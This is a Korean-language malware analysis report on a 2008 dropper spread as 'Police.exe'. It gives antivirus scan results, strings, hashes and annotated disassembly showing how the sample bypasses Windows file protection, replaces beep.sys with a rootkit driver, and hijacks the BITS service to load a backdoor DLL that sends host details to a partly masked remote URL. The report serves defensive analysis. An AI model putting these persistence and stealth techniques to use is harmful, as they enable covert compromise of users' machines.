Dropper/Agent.97280.D Analysis 1. 개요잊을만하면한번씩사회공학기법 (Social Engineering) 을이용한악성코드가출현했다. 이번에는첨부파일인 Police.exe 를확인하고경찰서로출두하라는내용과함께불특정다수에게유포되었는데아마메일을받고도둑이제발저린다고순간뜨끔했던사용자들도있었을것이다. 이문서에서 Dropper/Agent.97280.D( 이하 Agent.97280.D) 에대해서최대한 <?> 상세하게분석해보자. 2. VirusTotal Scan Result AhnLab-V3 2008.9.23.1 2008.09.23 Dropper/Agent.97280.D AntiVir 7.8.1.34 2008.09.23 TR/Agent.68096 Authentium 5.1.0.4 2008.09.23 W32/SYStroj.N.gen!Eldorado Avast 4.8.1195.0 2008.09.22 Win32:Trojan-gen {Other} AVG 8.0.0.161 2008.09.23 Worm/Agent.N BitDefender 7.2 2008.09.23 Trojan.Generic.365556 CAT-QuickHeal 9.50 2008.09.23 Rootkit.Agent.btu ClamAV 0.93.1 2008.09.23 Trojan.Agent-42842 DrWeb 4.44.0.09170 2008.09.23 Trojan.DownLoad.1178 esafe 7.0.17.0 2008.09.22 Rootkit.Win32.Agent. etrust-vet 31.6.6101 2008.09.23 - Ewido 4.0 2008.09.23 Rootkit.Agent.btu F-Prot 4.4.4.56 2008.09.22 W32/Backdoor2.CGEO F-Secure 8.0.14332.0 2008.09.23 Rootkit.Win32.Agent.btu Fortinet 3.113.0.0 2008.09.23 W32/Agent.BTU!tr.rkit GData 19 2008.09.23 Trojan.Generic.365556 Ikarus T3.1.1.34.0 2008.09.23 Rootkit.Win32.Agent.btu K7AntiVirus 7.10.469 2008.09.23 Rootkit.Win32.Agent.btu Kaspersky 7.0.0.125 2008.09.23 Rootkit.Win32.Agent.btu McAfee 5389 2008.09.22 Generic BackDoor.t Microsoft 1.3903 2008.09.23 - NOD32v2 3464 2008.09.23 probably a variant of Win32/Genetik Norman 5.80.02 2008.09.19 W32/Rootkit.OVH Panda 9.0.0.4 2008.09.22 Suspicious file PCTools 4.4.2.0 2008.09.23 - Prevx1 V2 2008.09.23 - Rising 20.63.12.00 2008.09.23 Backdoor.Win32.Undef.bio Sophos 4.33.0 2008.09.23 Sus/Behav-1009 Sunbelt 3.1.1662.1 2008.09.23 Rootkit.Win32.Agent.btu Symantec 10 2008.09.23 - TheHacker 6.3.0.9.091 2008.09.23 - TrendMicro 8.700.0.1004 2008.09.23 BKDR_PCLIENT.AR VBA32 3.12.8.5 2008.09.23 Backdoor.Win32.Agent.oog ViRobot 2008.9.23.1389 2008.09.23 Trojan.Win32.RT-Agent.97280 VirusBuster 4.5.11.0 2008.09.23 - Webwasher-Gateway 6.6.2 2008.09.23 Trojan.Agent.68096-1 -
2008.09.23 23:02(GMT +09:00) 에 police.exe 를 VirusTotal 에돌려보면위의진단결과처럼대다수의백신이진단하고있음을알수가있었다. 3. BinText String & Hash Analysis (3-1) BinText String Analysis [String Information] - Dropper Function: Agent.97280.D 내부에포함된또다른 MZ-PE 구조를가진파일을생성할때 (String:Dropper) 00001F61 00403161 (String:Dropper) 00002AFD 004040FD (API:FileDrop==) 000018E8 004024E8 (API:FileDrop==) 0000186A 0040246A (API:FileDrop==) 00001878 00402478 (API:FileDrop==) 000019E6 004025E6 (API:FileDrop==) 0000185C 0040245C (API:FileDrop==) 0000EF00 00410500 (API:FileDrop==) 0000EF46 00410546 0!This program cannot be run in DOS mode. 0!This program cannot be run in DOS mode. 0 SizeofResource 0 LoadResource 0 FindResourceA 0 FreeResource 0 CreateFileA 0 CopyFileA 0 WriteFile - Web Connection: Web 에접속하여추가로어떤행위를하려고할때 (String:GetURL=) 0000F9C6 00410FC6 0 Referer: http://%s (String:GetURL=) 0000FAB0 004110B0 0 http:// (String:NoIfDir) 0000F952 00410F52 0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)Cache-Control: no-store, must-revalidate (API:ConnectURL) 0000F580 00410B80 0 InternetOpenUrlA (API:ConnectURL) 0000F594 00410B94 0 InternetOpenA (API:ConnectURL) 0000F558 00410B58 0 InternetReadFile (API:ConnectURL) 0000F56C 00410B6C 0 InternetCloseHandle - Stealth Function: 자신을은폐시킬때 (API:Stealth===) 0000257C 0040377C (API:Stealth===) 000028A8 00403AA8 (API:Stealth===) 00002530 00403730 (API:Stealth===) 00002552 00403752 (API:Stealth===) 00002564 00403764 (API:Stealth===) 000025CA 004037CA 0 KeServiceDescriptorTable 0 Can't find KeServiceDescriptorTable 0 IofCompleteRequest 0 IoDeleteDevice 0 IoDeleteSymbolicLink 0 ntoskrnl.exe - File Control: 특정프로세스를종료또는삭제그리고레지스트리설정할때 (API:FileRun===) 0000F270 00410870 0 ShellExecuteA (API:FileDel===) 00001A1C 0040261C 0 DeleteFileA (API:ProcKill==) 0000EE7A 0041047A 0 TerminateProcess (API:Registry==) 00001B0A 0040270A 0 RegSetValueExA (API:Registry==) 00001B1A 0040271A 0 RegCloseKey (API:Registry==) 00001AFA 004026FA 0 RegOpenKeyExA (API:FileHandle) 0000EF2A 0041052A 0 GetFileSize (API:FileHandle) 0000F25E 0041085E 0 SHGetFileInfoA (API:FileHandle) 0000ED84 00410384 0 FindNextFileA (API:FileHandle) 0000EDD6 004103D6 0 FindFirstFileA (API:FileHandle) 0000ED78 00410378 0 FindClose - Service Control: 특정서비스를제어할때 (API:Service===) 00001B6E 0040276E 0 CloseServiceHandle - 2 -
(API:Service===) 00001AEC 004026EC (API:Service===) 00001B38 00402738 (API:Service===) 00001B5E 0040275E (API:Service===) 00001B82 00402782 (API:Service===) 00001B28 00402728 (API:Service===) 00001B82 00402782 (API:Service===) 00001B48 00402748 [/String Information] 0 OpenServiceA 0 OpenSCManagerA 0 StartServiceA 0 QueryServiceStatus 0 ControlService 0 QueryServiceStatus 0 ChangeServiceConfigA 지금까지분석한악성코드가사용하는문자열이나 API 를 DB 화한후매칭시키는방법으로얼마나일치하는지비교해본결과 String 은좀부족하지만위에나열된 API 들을통해서 Agent.97280.D 가대략적으로어떤행위를한다는것을유추할수있었다. (3-2) Hash Analysis File: C:\TempDir\Police.exe Size: 97280 bytes MD5: CE2F09ED6BB0EF6EBE7808A817BD7F79 SHA1: D2A5338AEEA7A796357797B862A4AAF1DC2D8A60 CRC32: 858B8CF8 4. Technical Analysis (4-1) %SYSTEM%\Drivers\beep.sys 대체하기 Beep.sys 는원래윈도우 OS 에존재하는정상파일이다. 그러나요즘악성코드들이정상 beep.sys 를삭제하고자신의존재를은폐시키기위한루트킷드라이버로서 beep.sys 파일을생성하고있다. 일단아래루틴을통해서정상 beep.sys 의존재여부를검사한다. //--- %SYSTEM%\drivers\beep.sys 찾기 ---// 00401C5A. 68 00010000 push 100 ; /BufSize = 100 (256.) 00401C5F. 50 push eax ; Buffer 00401C60. FF15 A8204000 call dword ptr [<&KERNEL32.GetSystemD>; \GetSystemDirectoryA 00401C66. BF AC3B4000 mov edi, 00403BAC ; ASCII "\drivers\beep.sys" 00401C70. 8D5424 10 lea edx, dword ptr [esp+10] Stack address=0012fe24, (ASCII "C:\WINDOWS\system32") edx=7ffb0000 00401C74. F2:AE repne scas byte ptr es:[edi] ;[edi]="c:\windows\system32\drivers\beep.sys" 00401C94. E8 37FFFFFF call 00401BD0 정상 beep.sys 를삭제하기위해서는 sfc_os.dll 에서제공하는 Export 함수를우회한다. 좀더쉽게말하면윈도우에서는시스템파일이삭제되면시스템변경및복구관련메시지를출력하지만악성코드에서관련 Export 함수를우회하므로메시지가출력되지않는다. //--- 파일보호우회하기 ---// 00401C05. 83C4 08 add esp, 8 00401C08. 68 683B4000 push 00403B68 ; /FileName = "sfc_os.dll" 00401C0D. FF15 88204000 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA Executable modules, item 7 Base=76C10000 Size=00029000 (167936.) - 3 -
Entry=76C1F03A sfc_os.<moduleentrypoint> Name=sfc_os (system) File version=5.1.2600.5512 (xpsp.080413-2111 Path=C:\WINDOWS\system32\sfc_os.dll 00401C13. 8BF0 mov esi, eax ; eax=76c10000 (sfc_os.76c10000), esi=00403bbe (Police.00403BBE) 00401C19. 6A 05 push 5 ; /ProcNameOrOrdinal = #5 00401C1B. 56 push esi ; hmodule, esi=76c10000 (sfc_os.76c10000) 00401C1C. FF15 BC204000 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress 00401C22. 8D5424 08 lea edx, dword ptr [esp+8] 00401C26. 6A FF push -1 00401C28. 52 push edx 00401C29. 6A 00 push 0 00401C2B. FFD0 call eax ; eax=76c19436 (sfc_os.#5) 상기루틴을통해서 sfc_os.dll 를우회하는데성공하였다면아래루틴을통해서정상 beep.sys 를삭제한후동일한경로에동일한파일명을사용하여루트킷드라이버를생성한다. 참고로윈도우에서사용하는정상 beep.sys 는약 5kb 로 Agent.97280.D 가생성하는 beep.sys 는약 3kb 이다. 따라서 beep.sys 가존재한다고해서무조건악성은아니며또한 Agent.97280.D 에감염된것은아님을밝혀둔다. //--- beep.sys 삭제 ---// 00401CA3. 50 push eax ; /FileName = C:\WINDOWS\system32\drivers\beep.sys 00401CA4. FFD7 call edi ; \DeleteFileA //--- beep.sys 생성 ---// 00401CA6. 6A 00 push 0 ; /htemplatefile = NULL 00401CA8. 6A 02 push 2 ; Attributes = HIDDEN 00401CAA. 6A 02 push 2 ; Mode = CREATE_ALWAYS 00401CAC. 6A 00 push 0 ; psecurity = NULL 00401CAE. 6A 02 push 2 ; ShareMode = FILE_SHARE_WRITE 00401CB0. 8D4C24 24 lea ecx, dword ptr [esp+24] ; 00401CB4. 68 00000040 push 40000000 ; Access = GENERIC_WRITE 00401CB9. 51 push ecx ; FileName = C:\WINDOWS\system32\drivers\beep.sys 00401CBA. FF15 38204000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA 00401CCA. 6A 00 push 0 ; /poverlapped = NULL 00401CCC. 52 push edx ; pbyteswritten 00401CCD. 68 C6080000 push 8C6 ; nbytestowrite = 8C6 (2246.), beep.sys 의크기 00401CD2. 68 14314000 push 00403114 ; Buffer = Police.00403114, beep.sys 의 MZ헤더위치 00401CD7. 56 push esi ; hfile 00401CD8. FF15 8C204000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile //---- Agent.97280.D 가생성한 Drivers/beep.sys 파일의일부 ----// 00403114 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ?........ 00403124 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00?...@... 00403134 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00... 00403144 00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00...?.. 00403154 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68?.???L?Th 00403164 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 00403174 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS - 4 -
(4-2) %TEMP%\%d_res.tmp 파일생성하기 //--- %Temp% Path 얻기 ---// 004013C0. 50 push eax ; /Buffer 004013C1. 68 04010000 push 104 ; BufSize = 104 (260.) 004013C6. FF15 48204000 call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA 004013D2. 8D8C24 34010000 lea ecx, dword ptr [esp+134] ; [esp+134] = 리턴된 %TEMP% 의경로 //--- %TEMP%\%d_res.tmp 파일생성 ---// 004013D9. 50 push eax ; /<%d> eax = 0x00536761h 004013DA. 51 push ecx ; <%s> = C:\DOCUME~1\AHNMAR~1\LOCALS~1\Temp\ 004013DB. 8D5424 38 lea edx, dword ptr [esp+38] ; 004013DF. 68 E0304000 push 004030E0 ; Format = "%s\%d_res.tmp" 004013E4. 52 push edx ; s 004013E5. FF15 30214000 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfa 004013F2. 8B8424 54020000 mov eax, dword ptr [esp+254] ; Police.00403030 = File Type:DLL //--- 리소스찾기 ---// 00401409. 50 push eax ; /ResourceType = File Type(DLL) 0040140A. 51 push ecx ; ResourceName = 66 0040140B. 56 push esi ; hmodule 0040140C. FF15 40204000 call dword ptr [<&KERNEL32.FindResourceA>] ; \FindResourceA 00401412. 8BD8 mov ebx, eax ; Police.00404050 00404050 B0 40 00 00 00 4C 01 00?...L.. 0x00404050h: 0x000040B0h, %TEMP%\%d_res.tmp 파일의 MZ 헤더위치 0x00404054h: 0x00014C00h, %TEMP%\%d_res.tmp 파일의크기 //--- 리소스로딩 ---// 00401422 > \53 push ebx ; /hresource = 00404050 00401423. 56 push esi ; hmodule 00401424. FF15 3C204000 call dword ptr [<&KERNEL32.LoadResource>] ; \LoadResource //--- 파일생성 ---// 0040143A > \6A 00 push 0 ; /htemplatefile = NULL 0040143C. 68 80000000 push 80 ; Attributes = NORMAL 00401441. 6A 02 push 2 ; Mode = CREATE_ALWAYS 00401443. 6A 00 push 0 ; psecurity = NULL 00401445. 6A 02 push 2 ; ShareMode = FILE_SHARE_WRITE 00401447. 8D5424 44 lea edx, dword ptr [esp+44] ; 0040144B. 68 00000040 push 40000000 ; Access = GENERIC_WRITE 00401450. 52 push edx ; FileName = % 랜덤한문자 %_res.tmp edx=0012f9b8, (ASCII "C:\DOCUME~1\AHNMAR~1\LOCALS~1\Temp\\3923359_res.tmp") 00401451. FF15 38204000 call dword ptr [<&KERNEL32.CreateFileA>] ; \CreateFileA //--- 랜덤한문자 %_res.tmp%_res.tmp 에코드쓰기 ---// 004014D1. 6A 00 push 0 ; /poverlapped = NULL 004014D3. 51 push ecx ; pbyteswritten 004014D4. 53 push ebx ; /hresource = 00404050-5 -
004014D5. 6A 00 push 0 ; hmodule = NULL 004014D7. FF15 5C204000 call dword ptr [<&KERNEL32.SizeofResource>>; \SizeofResource 004014DD. 50 push eax ; nbytestowrite = 14C00 (84992.) 004014DE. 57 push edi ; Buffer 004014DF. 56 push esi ; hfile 004014E0. FF15 8C204000 call dword ptr [<&KERNEL32.WriteFile>] ; \WriteFile //--- 파일이동 ---// 004014FF. 56 push esi ; /NewName = C:\WINDOWS\system32\BITSEx.dll 00401500. 52 push edx ; ExistingName = C:\DOCUME~1\AHNMAR~1\LOCALS~1\Temp\\3923359_res.tmp 00401501. FF15 98204000 call dword ptr [<&KERNEL32.MoveFileA>] ; \MoveFile A //--- 파일속성설정 ---// 00401507. 6A 06 push 6 ; /FileAttributes = HIDDEN SYSTEM 00401509. 56 push esi ; FileName = ASCII "C:\WINDOWS\system32\BITSEx.dll 0040150A. FF15 A0204000 call dword ptr [<&KERNEL32.SetFileAttribut>; \SetFileAttributesA //--- 파일삭제 ---// 00401510. 8D4424 30 lea eax, dword ptr [esp+30] 00401514. 50 push eax ; /FileName = C:\DOCUME~1\AHNMAR~1\LOCALS~1\Temp\\3923359_res.tmp 00401515. FF15 A4204000 call dword ptr [<&KERNEL32.DeleteFileA>] ; \DeleteFileA (4-3) %SYSTEM%\BITSEx.dll 파일이동 DLL 파일을생성하기에앞서 SYSTEM32 경로를얻어오기위해서 GetSystemDirectoryA 함수를사용한다. //--- %SYSTEM% Path 얻기 ---// 004011DC. 68 04010000 push 104 ; /BufSize = 104 (260.) 004011E1. 50 push eax ; Buffer 004011E2. 897D EC mov dword ptr [ebp-14], edi ; 004011E5. 897D E4 mov dword ptr [ebp-1c], edi ; 004011E8. FF15 A8204000 call dword ptr [<&KERNEL32.GetSystemD>; \GetSystemDirectoryA 상기루틴을통해서 system32 경로를얻어왔으면 DLL 파일명을명명하기위해서윈도우의정상서비스명인 BITS 를가져와서 조합한다. //--- DLL File Naming ---// 004011EE. 8B75 08 mov esi, dword ptr [ebp+8] 004011F1. 8B1D 30214000 mov ebx, dword ptr [<&USER32.wsprint>; USER32.wsprintfA 004011F7. 8D8D C8FCFFFF lea ecx, dword ptr [ebp-338] 004011FD. 56 push esi ; /<%s> = BITS( 윈도우정상서비스명을얻어옴 ) 004011FE. 51 push ecx ; <%s> = %SYSTEMPATH% 004011FF. 8D95 CCFDFFFF lea edx, dword ptr [ebp-234] ; 00401205. 68 D4304000 push 004030D4 ; Format = "%s\%sex.dll" 0040120A. 52 push edx ; s 0040120B. FFD3 call ebx ; \wsprintfa 0012FBC4 0012FCE4 ASCII "C:\WINDOWS\system32\BITSEx.dll" %SYSTEM%\BITSExt.dll 란파일명으로생성을성공했다면아래루틴을통해서 BITS 서비스의 Parameter 로실행된다. - 6 -
//--- BITS Service Control ---// 00401234. 8D95 D0FEFFFF lea edx, dword ptr [ebp-130] 0040123A. 51 push ecx ; /phandle 0040123B. 68 3F000F00 push 0F003F ; Access = KEY_ALL_ACCESS 00401240. 6A 00 push 0 ; Reserved = 0 00401242. 52 push edx ; Subkey = SYSTEM\CurrentControlSet\Services\BITS 00401243. 68 02000080 push 80000002 ; hkey = HKEY_LOCAL_MACHINE 00401248. FF15 04204000 call dword ptr [<&ADVAPI32.RegOpenKeyExA>] ; \RegOpenKeyExA Parameter 로추가하기위해서일단해당서비스를비활성화시킨다. //--- BITS Service Status Changed ---// 0040126D. 6A 04 push 4 ; /BufSize = 4 0040126F. 51 push ecx ; Buffer 00401270. 6A 04 push 4 ; ValueType = REG_DWORD 00401272. 6A 00 push 0 ; Reserved = 0 00401274. 68 A4304000 push 004030A4 ; ValueName = "Start" 00401279. 52 push edx ; hkey 0040127A. C745 08 02000000 mov dword ptr [ebp+8], 2 ; Service Status Flag 00401281. FF15 08204000 call dword ptr [<&ADVAPI32.RegSetValueExA>>; \RegSetValueExA //--- BITS Service Parameter Control ---// 004012D3. 52 push edx ; /phandle 004012D4. 68 3F000F00 push 0F003F ; Access = KEY_ALL_ACCESS 004012D9. 6A 00 push 0 ; Reserved = 0 004012DB. 50 push eax ; Subkey = SYSTEM\CurrentControlSet\Services\BITS\Parameters 004012DC. 68 02000080 push 80000002 ; hkey = HKEY_LOCAL_MACHINE 004012E1. FF15 04204000 call dword ptr [<&ADVAPI32.RegOpenKeyExA>] ; \RegOpenKeyExA //--- %SYSTEM%\BITSEx.dll" added as a parameter of BITS service ---// 00401300 > \8DBD CCFDFFFF lea edi, dword ptr [ebp-234] ; [ebp-234] = C:\WINDOWS\system32\BITSEx.dll 00401306. 83C9 FF or ecx, FFFFFFFF 00401309. 33C0 xor eax, eax 0040130B. 8D95 CCFDFFFF lea edx, dword ptr [ebp-234] 00401311. F2:AE repne scas byte ptr es:[edi] 00401313. F7D1 not ecx 00401315. 51 push ecx ; /BufSize 00401316. 52 push edx ; Buffer = Stack Address for "C:\WINDOWS\system32\BITSEx.dll" 00401317. 6A 02 push 2 ; ValueType = REG_EXPAND_SZ 00401319. 50 push eax ; Reserved => 0 0040131A. 8B45 EC mov eax, dword ptr [ebp-14] ; 0040131D. 68 50304000 push 00403050 ; ValueName = "ServiceDll", 00401322. 50 push eax ; hkey 00401323. FF15 08204000 call dword ptr [<&ADVAPI32.RegSetValueExA>>; \RegSetValueExA 최종적으로구성된 DLL파일의 Parameter 형태는아래와같다. * The final result : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters\ ServiceDll="C:\WINDOWS\system32\BITSEx.dll" - 7 -
BITS 서비스의 Imagepath 값을보면아래와같다. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\ ImagePath=" %SystemRoot%\system32\svchost.exe -k netsvcs" 즉위와같이구성되면 BITSEx.dll 은 svchost.exe 에의해서로딩되며외부로접속하여추가악의적인행위를하는데쉽게말 하면정상 svchost.exe 가악의적인행위를하는것처럼보여진다. (5) %SYSTEM%\BITSEx.dll 분석하기 지금까지분석한내용을통해서 BTISEx.dll 이어떻게실행되는지알아봤다. 이제실행되는 BITSEx.dll 이어떤동작을하는지 알아보자. BITSEx.dll 은외부로접속하기위해서아래루틴을수행한다. //--- WinInet.dll 로딩및 Internet*****() 함수 EP얻기 ---// * wininet.dll 로딩하기 10001720 /$ 81EC F4030000 sub esp, 3F4 10001726. 56 push esi 10001727. 68 F4E00010 push 1000E0F4 ; /FileName = "wininet.dll" 1000172C. FF15 ACA00010 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA --- 중간생략 --- 1000173F. 8B3D B0A00010 mov edi, dword ptr [<&KERNEL32.GetPr>; kernel32.getprocaddress * Internet******() 함수 EP얻기 10001745. 68 E4E00010 push 1000E0E4 ; /ProcNameOrOrdinal = "InternetOpenA" 1000174A. 56 push esi ; hmodule 1000174B. FFD7 call edi ; \GetProcAddress 1000174D. 68 D0E00010 push 1000E0D0 ; /ProcNameOrOrdinal = "InternetOpenUrlA" 10001752. 56 push esi ; hmodule 10001753. 8BD8 mov ebx, eax ; 10001755. FFD7 call edi ; \GetProcAddress 10001757. 68 BCE00010 push 1000E0BC ; /ProcNameOrOrdinal = "InternetCloseHandle" 1000175C. 56 push esi ; hmodule 1000175D. 8BE8 mov ebp, eax ; 1000175F. FFD7 call edi ; \GetProcAddress 10001761. 68 A8E00010 push 1000E0A8 ; /ProcNameOrOrdinal = "InternetReadFile" 10001766. 56 push esi ; hmodule 10001767. 894424 18 mov dword ptr [esp+18], eax ; 1000176B. FFD7 call edi ; \GetProcAddress //--- Internet***** 익스포트함수 Call ---// 10001775. 68 A0E00010 push 1000E0A0 ; ASCII "RiSing" 1000177A. 894424 28 mov dword ptr [esp+28], eax 1000177E. FFD3 call ebx ; InternetOpenA() 의 EP 10001780. 8BD8 mov ebx, eax 10001782. 85DB test ebx, ebx 10001784. 74 47 je short 100017CD 10001786. 8B8424 080400>mov eax, dword ptr [esp+408] ; BITSEx.1000E1B8 Stack ss:[0006f38c]=1000e1b8 (BITSEx.1000E1B8), ASCII "http://2**.5*.4*.5*/logo.jpg? [0006F38C] 에는암호화되지않는 URL 주소가저장되어있지만 Internet***** 익스포트함수를 Call 하기전에상당히까다로 - 8 -
운방법을사용하여인코딩되어있었다. --- 중간생략 --- 1000178F. 68 00000004 push 4000000 10001798. 50 push eax 10001799. 53 push ebx 1000179A. FFD5 call ebp ; InternetOpenUrlA() 의 EP //--- 시스템정보얻기 ---// %SYSTEM%\BITSEx.dll 는감염된시스템의정보 ( 컴퓨터이름, 윈도우 OS 버전, 메모리양 ) 를얻어버퍼에저장한후위에서 알아낸 URL 에조합하여전송하는것으로보였다. ( 참고로 IDA Pro 를이용해서분석했다..text:10003EBA lea eax, [esp+0c0h+nsize].text:10003ebe mov [esp+0c0h+nsize], 40h.text:10003EC6 push eax ; nsize.text:10003ec7 push ebx ; lpbuffer.text:10003ec8 call ds:getcomputernamea.text:10003edb lea ecx, [esp+0c0h+versioninformation].text:10003edf mov [esp+0c0h+versioninformation.dwosversioninfosize], 94h.text:10003EE7 push ecx ; lpversioninformation.text:10003ee8 call ds:getversionexa ; Get extended information about the.text:10003ee8 ; version of the operating system.text:10003fad lea eax, [esp+0c8h+buffer].text:10003fb1 mov [esp+0c8h+buffer.dwlength], 20h.text:10003FB9 push eax ; lpbuffer.text:10003fba call ds:globalmemorystatus.text:10003fc0 mov ecx, [esp+0c8h+buffer.dwtotalphys].text:10003fc4 add ebx, 40h.text:10003FC7 shr ecx, 14h.text:10003FCA inc ecx.text:10003fcb push ecx.text:10003fcc push offset s_dmb ; "%dmb".text:10003fd1 push ebx ; LPSTR.text:10003FD2 call ds:wsprintfa 그외백도어로도활동하는것으로보이는데 %SYSTEM%\BITSEx.dll 에서파악된기능은마우스및키보드이벤트로깅, SeShutdownPrivilege 를통해서시스템의제어권 (logoff, Restart, Shut Down) 및화면캡쳐등을할수있는것으로보인다. 또한원격지의악의적인사용자가특정사이트로부터파일을다운로드및실행할수있는기능도존재하였다. 결론은 %SYSTEM%\BITSEx.dll 은백도어로서그리고함께생성된 %SYSTEM%\Drivers\beep.sys 에의해서은폐되어동작 하는것으로보인다. - 9 -